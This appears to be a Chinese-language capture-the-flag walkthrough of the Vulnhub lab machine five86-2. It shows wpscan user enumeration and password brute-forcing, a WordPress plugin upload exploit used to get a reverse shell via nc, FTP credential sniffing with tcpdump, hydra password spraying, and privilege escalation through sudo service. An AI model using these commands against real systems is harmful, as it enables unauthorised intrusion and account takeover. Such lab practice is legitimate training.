
1
免责声明
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
2
内容速览
这是网络安全自修室每周带星球小伙伴一起实战的第10台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知!
靶机可从Vulnhub平台 免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标!
攻击机:Kali Linux
靶机环境:192.168.241.147
所用工具:nmap | wpscan | nc | tcpdump | hydra


值得注意的是: 发现开了80端口却无法访问,是重定向到five86-2域名 可改如下hosts文件
win10路径: C:\Windows\System32\drivers\etc\hosts
linux路径: etc/hosts
访问页面发现是Wordpress框架
使用wpscan工具进行信息搜集
wpscan --url http://192.168.241.147 -e u
wpscan --url http://192.168.241.147 -e vp

将用户保存到users.txt
admin
peter
barney
gillian
stephen
尝试爆破后台密码
wpscan --url http://192.168.241.147 -U users.txt -P /usr/share/wordlists/rockyou.txt
综上信息搜集可以发现, 开启了20,21,80端口,其中web为wordpress框架,ftp服务无法匿名登录,目标机器为Ubuntu,重点考虑从web进行突破
通过暴力破解,获取两个账号密码

[SUCCESS] - barney / spooky1
[SUCCESS] - stephen / apollo1
进入后台,发现存在一个插件Insert or Embed Articulate Content into WordPress Trial

在谷歌上搜索一下,不难搜到这个插件的RCE:WordPress插件IEAC漏洞分析及组合利用尝试,在exploit-db上也有
先生成poc.zip
echo "hello" > index.html
echo "" > index.php
zip poc.zip index.html index.php
这里的index.php以反弹MM替换
然后登录wordpress后台,选择新建文章


上传后返回路径,直接访问
使用nc监听1234端口,成功拿到shell

切换到stephen用户,发现在pcap组,且无法使用sudo -l

考虑进行流量抓包,查看可抓包接口,可以使用如下命令列出可用于抓包的接口
tcpdump -D

这里选择把后面两个抓下来,因为不怎么常见。抓包命令为
timeout 120 tcpdump -w 1.pcap -i veth37191d0
其中timeout 120是指2分钟,-w是将结果输出到文件,-i是指定监听端口
同理,把第一个br-eca385接口也监听下 使用tcpdump -r 1.pcap读取内容,不难发现paul用户FTP的密码esomepasswford

发现ftp的密码为esomepasswford
尝试用户去密码喷洒一下ftp服务
hydra -L sshuser.txt -p 'esomepasswford' five86-2 ftp -vV
其中sshuser.txt为
barney
george
gillian
john
paul
peter
richard
stephen

得到paul的账户密码为esomepasswford切换到paul用户,进行信息搜集,发现可以使用peter的service命令

直接切换到peter的/bin/bash服务
sudo -u peter service /bin/bash

这里要注意: /bin/bash的目录../../
发现peter是可以直接使用root的passwd命令的,好家伙,直接修改root密码,登录拿到最终flag
